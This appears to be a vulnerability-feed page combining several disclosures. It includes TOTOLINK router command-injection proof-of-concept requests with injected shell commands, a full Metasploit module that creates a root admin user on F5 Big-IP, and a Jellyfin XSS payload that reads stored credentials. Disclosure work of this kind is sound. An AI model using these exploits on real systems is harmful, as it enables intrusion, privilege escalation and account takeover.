TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagTracertHop parameter in the setNetworkDiag function.

Permalink

Cannot retrieve contributors at this time

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagTracertHop parameter in the function setNetworkDiag****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "1", "NetDiagTracertHop": "20||ls;"}
    

The function setNetworkDiag is used to set the corresponding variable

In function showNetworkDiag

step into function getDiagInfo，V11 is the value of system.NetDiag.method

CVE-2023-24143: CVE-vulns/setNetworkDiag_NetDiagTracertHop.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the plugin_version parameter in the setUnloadUserData function.

Permalink

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the plugin\_version parameter in the function setUnloadUserData****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setUnloadUserData.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" : "setting/setUnloadUserData", "plugin_version": "|mkdir /setUnloadUserData_2222;"}
    

Folder created successfully

CVE-2023-24145: CVE-vulns/setUnloadUserData.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the host_time parameter in the NTPSyncWithHost function.

Permalink

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the host\_time parameter in the function NTPSyncWithHost****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in NTPSyncWithHost.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl":"NTPSyncWithHost", "host_time":"2022-01-01 20:12:43';mkdir /test9999;'"}
    

Folder created successfully

CVE-2023-24138: CVE-vulns/NTPSyncWithHost.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingNum parameter in the setNetworkDiag function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingNum": "4||ls;"}

CVE-2023-24140: CVE-vulns/setNetworkDiag_NetDiagPingNum.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the minute parameter in the setRebootScheCfg function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setRebootScheCfg.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setRebootScheCfg","mode" : "1", "minute": "';mkdir /minute_1111;'"}
    

    int __fastcall setRebootScheCfg(int a1, int a2, int a3)
    {
      int mode_v; // $s5
      int week_v; // $s3
      const char *hour_v; // $fp
      const char *minute_v; // $s7
      int recHour_v; // $s0
      int v9; // $v0
      int v11; // $v0
      int i; // $s0
      _BYTE *v13; // $v0
      char *v14; // $a0
      int v15; // $s0
      int v16; // $s0
      char v19[256]; // [sp+2Ch] [-244h] BYREF
      char v20[128]; // [sp+12Ch] [-144h] BYREF
      char v21[128]; // [sp+1ACh] [-C4h] BYREF
      int v22[16]; // [sp+22Ch] [-44h] BYREF
    
      memset(v20, 0, sizeof(v20));
      memset(v21, 0, sizeof(v21));
      memset(v19, 0, sizeof(v19));
      mode_v = websGetVar(a2, "mode", "0");
      week_v = websGetVar(a2, "week", "");
      hour_v = (const char *)websGetVar(a2, "hour", "");
      minute_v = (const char *)websGetVar(a2, "minute", "");
      recHour_v = websGetVar(a2, "recHour", "0");
      cs_uci_set("system.reboot.mode", mode_v);
      cs_uci_set("system.reboot.week", week_v);
      cs_uci_set("system.reboot.hour", hour_v);
      cs_uci_set("system.reboot.minute", minute_v);
      cs_uci_set("system.reboot.recHour", recHour_v);
      cs_uci_commit("system");
      strcpy(v19, "sed -i /reboot/d /etc/crontabs/root");
      CsteSystem(v19, 0);
      CsteSystem("killall sche_reboot", 0);
      v9 = atoi(mode_v);
      if ( v9 == 1 )                                // mode=1
      {
        v11 = atoi(week_v);
        if ( v11 == 255 )
        {
          strcpy(v21, "*");
        }
        else if ( v11 )
        {
          for ( i = 1; i != 8; ++i )
          {
            if ( ((atoi(week_v) >> i) & 1) != 0 )
            {
              sprintf(v20, (const char *)&dword_4404, i);
              strcat(v21, v20);
              strcat(v21, &dword_4408);
            }
          }
          v13 = (_BYTE *)strrchr(v21, 44);
          if ( v13 )
            *v13 = 0;
        }
        sprintf(v19, "echo '%s %s * * %s reboot -f'>> /etc/crontabs/root", minute_v, hour_v, v21);
        v14 = v19;
    LABEL_13:
        CsteSystem(v14, 0);
        goto LABEL_3;
      }
      if ( v9 == 2 )
      {
        v15 = atoi(recHour_v);
        if ( v15 > 0 )
        {
          sysinfo(v22);
          v16 = 3600 * v15 - v22[0];
          if ( v16 <= 0 )
          {
            cs_cmd("reboot", 16464, 1);
            goto LABEL_3;
          }
          CsteSystem("killall sche_reboot", 0);
          sprintf(v20, "sche_reboot %ld &", v16);
          v14 = v20;
          goto LABEL_13;
        }
      }
    LABEL_3:
      cs_cmd("/etc/init.d/cron", "restart", 2);
      websSetCfgResponse(a1, a3, "0", "reserv");
      return 0;
    }

CVE-2023-24146: CVE-vulns/setRebootScheCfg_minute.md at main · Double-q1015/CVE-vulns

This Metasploit module creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue. Note that this is pretty noisy, since it creates a user account and creates log files and such. Additionally, most (if not all) vulnerabilities in F5 grant root access anyways.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'unix_crypt'class MetasploitModule < Msf::Exploit::Local  include Msf::Post::Linux::F5Mcp  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'F5 Big-IP Create Admin User',        'Description' => %q{          This creates a local user with a username/password and root-level          privileges. Note that a root-level account is not required to do this,          which makes it a privilege escalation issue.          Note that this is pretty noisy, since it creates a user account and          creates log files and such. Additionally, most (if not all)          vulnerabilities in F5 grant root access anyways.          Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb        },        'License' => MSF_LICENSE,        'Author' => ['Ron Bowes'],        'Platform' => [ 'unix', 'linux', 'python' ],        'SessionTypes' => ['shell', 'meterpreter'],        'References' => [          ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],          ['URL', 'https://support.f5.com/csp/article/K97843387'],        ],        'Privileged' => true,        'DisclosureDate' => '2022-11-16',        'Arch' => [ ARCH_CMD, ARCH_PYTHON ],        'Type' => :unix_cmd,        'Targets' => [[ 'Auto', {} ]],        'Notes' => {          'Stability' => [],          'Reliability' => [],          'SideEffects' => []        }      )    )    register_options([      OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]),      OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]),      OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]),    ])  end  def exploit    # Get or generate the username/password    fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty?    username = datastore['USERNAME']    if datastore['CREATE_SESSION']      password = Rex::Text.rand_text_alphanumeric(12)      new_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)      print_status("Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session")    else      password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)      print_status("Will attempt to create user #{username} / #{password}")    end    # If the password is already hashed, leave it as-is    vprint_status('Hashing the password with SHA512')    hashed_password = UnixCrypt::SHA512.build(password)    if !hashed_password || hashed_password.empty?      fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt')    end    # These requests have to go in a single 'session', which, to us, is    # a single packet (since we don't have AF_UNIX sockets)    result = mcp_send_recv([      # Authenticate as 'admin' (this probably shouldn't work but does)      mcp_build('user_authenticated', 'structure', [        mcp_build('user_authenticated_name', 'string', 'admin')      ]),      # Start transaction      mcp_build('start_transaction', 'structure', [        mcp_build('start_transaction_load_type', 'ulong', 0)      ]),      # Create the role mapping      mcp_build('create', 'structure', [        mcp_build('user_role_partition', 'structure', [          mcp_build('user_role_partition_user', 'string', username),          mcp_build('user_role_partition_role', 'ulong', 0),          mcp_build('user_role_partition_partition', 'string', '[All]'),        ])      ]),      # Create the userdb entry      mcp_build('create', 'structure', [        mcp_build('userdb_entry', 'structure', [          mcp_build('userdb_entry_name', 'string', username),          mcp_build('userdb_entry_partition_id', 'string', 'Common'),          mcp_build('userdb_entry_is_system', 'ulong', 0),          mcp_build('userdb_entry_shell', 'string', '/bin/bash'),          mcp_build('userdb_entry_is_crypted', 'ulong', 1),          mcp_build('userdb_entry_passwd', 'string', hashed_password),        ])      ]),      # Finish the transaction      mcp_build('end_transaction', 'structure', [])    ])    # Handle errors    if result.nil?      fail_with(Failure::Unknown, 'Request to mcp appeared to fail')    end    # The only result we really care about is an error    error_returned = false    result.each do |r|      result = mcp_get_single(r, 'result')      result_code = mcp_get_single(result, 'result_code')      # If there's no code or it's zero, just ignore it      if result_code.nil? || result_code == 0        next      end      # If we're here, an error was returned!      error_returned = true      # Otherwise, try and get result_message      result_message = mcp_get_single(result, 'result_message')      if result_message.nil?        print_warning("mcp query returned a non-zero result (#{result_code}), but no error message")      else        print_error("mcp query returned an error message: #{result_message} (code: #{result_code})")      end    end    # Let them know if it likely worked    if !error_returned      print_good("Service didn't return an error, so user was likely created!")      if datastore['CREATE_SESSION']        print_status('Attempting create a root session...')        out = cmd_exec("echo -ne \"#{password}\\n#{password}\\n#{new_password}\\n#{new_password}\\n#{payload.encoded}\\n\" | su #{username}")        vprint_status("Output from su command: #{out}")      end    end  endend

F5 Big-IP Create Administrative User

In Jellyfin 10.8.x through 10.8.3, the name of a collection is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.

**usd-2022-0031 | Jellyfin 10.8.1 - Cross-Site Scripting**

**Advisory ID:** usd-2022-0031  
**Product:** Jellyfin  
**Affected Version:** 10.8.1  
**Vulnerability Type:** CWE-79  
**Security Risk:** Critical  
**Vendor URL:** https://jellyfin.org  
**Vendor Status:** fixed  
**CVE number:** CVE-2023-23635

**Description**

A stored XSS in Jellyfin 10.8.1 allows an remote attacker to inject JavaScript into the name of a collection to perform a Cross-Site Scripting (XSS) attack.  
Because session tokens are stored in the localStorage, the attacker can extract them via javascript.

**Proof of Concept**

The following screenshot shows how an attacker can create a malicious collection.

  
The injected JavaScript code is executed in the user's browser, if a user (e.g. admin) visits the _collections_ page.

  
If you want to do some more interesting stuff with this vulnerability like taking over the admin account, you can use the following payload to read the access tokens from the localStorage.

"><img src=/X onerror=alert(localStorage.getItem("jellyfin\_credentials"))>

Getting the access token and device id allows you to rebuild the request for the _Quick Connect_ Feature.

This feature allows users to login using a PIN. The following request sets a PIN.

POST /QuickConnect/Authorize?Code=111111 HTTP/1.1  
Host: localhost:8096  
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: \*/\*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Emby-Authorization: MediaBrowser Client="Jellyfin Web", Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0OyBydjoxMDAuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMDAuMHwxNjU2NzU0NTEwMjcz", Version="10.8.1", Token="7bd97aae0924484884d7d13a74e9517c"  
Origin: \[http://localhost:8096\]()  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Connection: close  
Cookie: sfcsrftoken=S82egH1Csl8FsxnMPQ6NGzXCWL3tiI8tNUvfsNyXnAVoGGthaUjsjrWesdhvu9Gc  
Content-Length: 0

**Fix**

It is recommended to treat all input on the website as potentially dangerous.  
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.  
The majority of programming languages support standard procedures for encoding meta characters.

**References**

*   https://owasp.org/www-community/attacks/xss/
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23635 

**Timeline**

*   **2022-07-18**: First contact request via security@jellyfin.org
*   **2022-08-02**: Vulnerability details submitted
*   **2022-08-16**: Fixed by Vendor
*   **2023-01-16:** Requested CVE assigned
*   **2023-01-19**: The advisory is published

**Credits**

This security vulnerability was found by Christian Pöschl of usd AG.

CVE-2023-23635: Security Advisory usd- 2022-0031 | usd HeroLab

A flaw was found in pesign. The pesign package provides a systemd service used to start the pesign daemon. This service unit runs a script to set ACLs for /etc/pki/pesign and /run/pesign directories to grant access privileges to users in the 'pesign' group. However, the script doesn't check for symbolic links. This could allow an attacker to gain access to privileged files and directories via a path traversal attack.

*   
*   
*   
*   
*   
*   

**Bug 2135420** (CVE-2022-3560) - CVE-2022-3560 pesign: Local privilege escalation on pesign systemd service

Summary: CVE-2022-3560 pesign: Local privilege escalation on pesign systemd service

Keywords:

Status:

MODIFIED

Alias:

CVE-2022-3560

Product:

Security Response

Classification:

Other

Component:

vulnerability

Sub Component:

Version:

unspecified

Hardware:

All

OS:

Linux

Priority:

high

Severity:

high

Target Milestone:

\---

Assignee:

Red Hat Product Security

QA Contact:

Docs Contact:

URL:

Whiteboard:

Depends On:

2135819 2135820 2135821 2135822 2135823 2135825 2135826 2135828 2164235 2164236 2165983 2135824 2135827

Blocks:

2134226

TreeView+

depends on / blocked

Reported:

2022-10-17 15:26 UTC by Marco Benatto

Modified:

2023-01-31 18:58 UTC (History)

CC List:

5 users (show)

Fixed In Version:

pesign-116

Doc Type:

If docs needed, set a value

Doc Text:

A flaw was found in pesign. The pesign package provides a systemd service used to start the pesign daemon. This service unit runs a script to set ACLs for /etc/pki/pesign and /run/pesign directories to grant access privileges to users in the 'pesign' group. However, the script doesn't check for symbolic links. This could allow an attacker to gain access to privileged files and directories via a path traversal attack.

Clone Of:

Environment:

Last Closed:

  

Attachments

(Terms of Use)

Add an attachment (proposed patch, testcase, etc.)

  

Description Marco Benatto 2022-10-17 15:26:49 UTC

The pesign deamon started by the systemd service of the pesign package in vulnerable to a path traversal vulnerability allow a local privilege escalation. When properly exploited this flaw allows a malicious unprivileged user with access to pesign user or group can gain access to higher privileged files and directories.

Comment 17 Marco Benatto 2023-01-31 16:00:11 UTC

Created pesign tracking bugs for this issue:

Affects: fedora-all \[bug 2165983\]

Note You need to log in before you can comment on or make changes to this bug.

*   
*   
*   
*   
*   
*

CVE-2022-3560: Local privilege escalation on pesign systemd service

This is a Linux/portable port of OpenBSD's excellent OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen's SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, and many other clean-ups.

OpenSSH 9.2p1

Debian Linux Security Advisory 5338-1 - Guillaume Espanel, Pierre Libeau, Arnaud Morin and Damien Rannou discovered that missing input sanitising in the handling of VMDK images in Cinder, the OpenStack block storage system, may result in information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5338-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 01, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cinderCVE ID         : CVE-2022-47951Debian Bug     : 1029562Guillaume Espanel, Pierre Libeau, Arnaud Morin and Damien Rannoudiscovered that missing input sanitising in the handling of VMDK imagesin Cinder, the OpenStack block storage system, may result in informationdisclosure.For the stable distribution (bullseye), this problem has been fixed inversion 2:17.0.1-1+deb11u1.We recommend that you upgrade your cinder packages.For the detailed security status of cinder please refer toits security tracker page at:https://security-tracker.debian.org/tracker/cinderFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmParskACgkQEMKTtsN8TjbMhxAAvApHGxPkLq1ldUi5fgMjTloVBouyRJS/Ytsq3p5U0Yx98SvnPI9ab9nLRlWdVBjpdy9Wb6l0ouhaiiLR2kPJEv9D2Ux7oWdHpvexdtYs9eHdgx7Ym6Zibu6d/7hMgxPaG8zKEwJLCf2zuMqXbr6l55ht+DAmFJrzO/VyQyU2mlhkSXvCdmL9NAX+csEEW4WtLjx1MPD1gFz99uI3Q6DY3kTBu45BWG2xKkU0hHThsap0kRRK+6M9QINjW2zylsyhW2pB5/0j5X8bUgMX9jDFNMj9p5tWcpN2FwQa6YvKQoIONHSNJIXEaOsHiMXRQUGytS8UwW9UfDiPLzsKSreoaOaWzbtkvQvGrfauHmbySrVjZ2WCq+ZNiFGIJV7EhlJstFi3IwlJ3oYlZgUHlLusNGahqQo+KD18ipVPiSE89LIM9Zq+p7KpjLLTzjlSMgC7gLj4IJmCDRfxz7uxR0fUg/o9w0nhQNAr63hKbjzeJWDmRGQwpsuh/DBLR7AgwwuqiMkpBj27uPMD/aPFisLysP8xmO7IJobfuZzdXU+mCQg0fbwMWWF3JQHcew971YDoreBB73Su9NsMVWrSgUd2WC4axp+EPFQTHNas6OLM+oEhpK/dUILczzy/h9jPzH4wDAmQgv0nSOZSqGu7cuXSxsSGCzf8J8hpYoeysRn91Gc=NXlC-----END PGP SIGNATURE-----

Tag

#linux